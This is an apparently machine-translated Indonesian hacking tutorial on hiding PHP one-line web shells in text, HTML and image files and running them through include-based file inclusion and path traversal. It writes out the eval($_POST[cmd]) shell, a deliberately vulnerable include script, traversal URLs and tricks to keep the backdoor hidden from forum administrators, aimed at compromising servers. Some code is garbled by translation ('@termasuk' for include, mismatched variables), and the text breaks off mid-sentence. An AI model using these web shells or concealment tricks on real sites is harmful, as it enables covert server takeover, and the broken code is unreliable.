Perlu Anda ketahui bahwa jika Anda hanya memasukkan pernyataan PHP ke dalam gambar, maka tidak akan dieksekusi pula, karena PHP hanya mem-parsing file yang berekstensi php. Oleh karena itu, diperlukan kemampuan untuk mengeksekusi pernyataan PHP yang tersembunyi di dalam gambar. Kami hanya menggunakan fungsi pemanggilan di PHP: include, require, dll.
Kita masih ingat artikel tentang menyembunyikan Trojan di gambar beberapa hari lalu. Artinya, gunakan pernyataan seperti include("x.gif") di file PHP untuk memanggil pernyataan Trojan horse yang tersembunyi di dalam gambar. Pernyataan di ASP serupa. Kelihatannya sangat tersembunyi, namun jika memanggil gambar tersebut secara langsung, tidak akan sulit bagi seseorang yang mengetahui sedikit tentang PHP untuk menemukan sesuatu yang mencurigakan. Karena sulitnya melewatkan parameter menggunakan metode GET di URL, kinerja penyisipan Trojan tidak dapat dimanfaatkan sepenuhnya.
Fungsi include sering digunakan di PHP, sehingga menyebabkan terlalu banyak masalah keamanan. Misalnya, kerentanan PHPWIND1.36 disebabkan oleh kurangnya pemfilteran variabel di belakang include. Dari sini kita dapat membuat pernyataan serupa untuk dimasukkan ke dalam file PHP. Kemudian sembunyikan Trojan tersebut pada gambar atau file HTML yang bisa dikatakan lebih tersembunyi. Misalnya, masukkan pernyataan berikut di forum PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>Administrator umum tidak dapat melihatnya.
Dengan bantuan fungsi include, kita dapat menyembunyikan Trojan PHP di berbagai jenis file seperti file txt, html, dan gambar. Karena ketiga jenis file ini, file txt, html, dan gambar, adalah yang paling umum di forum dan sistem artikel, kami akan melakukan pengujian secara berurutan di bawah.
Pertama buat file PHP test.php. Isi filenya adalah:
<?php
$tes=$_GET['tes'];
@termasuk 'test/'.$test;
?>
File txt umumnya adalah file deskripsi, jadi kita dapat meletakkan Trojan satu kalimat di file deskripsi direktori. Cukup buat file TXT t.txt. Kita pastekan kalimat Trojan <?eval($_POST[cmd]);?> ke dalam file t.txt. Kemudian kunjungi http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > Jika Anda melihat t konten txt terbukti OK. Kemudian tambahkan alamat Trojan klien backdoor mikro PHP lanker ke http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? PHPWIND_ROOT=../robots.txt > Cukup tambahkan cmd pada kata sandi, dan Anda dapat melihat hasilnya melalui eksekusi.
Untuk file HTML, umumnya merupakan file template. Untuk mengaktifkan kuda Troya yang dimasukkan ke dalam file HTML untuk dipanggil dan dieksekusi tanpa ditampilkan, kita dapat menambahkan kotak teks dengan atribut tersembunyi di HTML, seperti: <input type=hidden value="<?eval($ _POST[cmd ]);?>"> Kemudian gunakan cara yang sama seperti di atas. Hasil kembali eksekusi umumnya dapat dilihat dengan melihat file sumber. Misalnya, gunakan fungsi melihat direktori program ini. Lihat konten file sumber sebagai <input type=hidden value="C:Uniserver2_7swwwtest"> Saya bisa mendapatkan direktori sebagai C:Uniserver2_7swwwtest.
Sekarang mari kita bicara tentang file gambar. Trik paling beracun adalah menyembunyikan kuda Troya di dalam gambar. Kita bisa langsung mengedit gambar dan menyisipkan <?eval($_POST[cmd]);?> di akhir gambar.
Setelah pengujian, umumnya tidak mempengaruhi gambar. Kemudian tambahkan alamat Trojan klien dengan cara yang sama<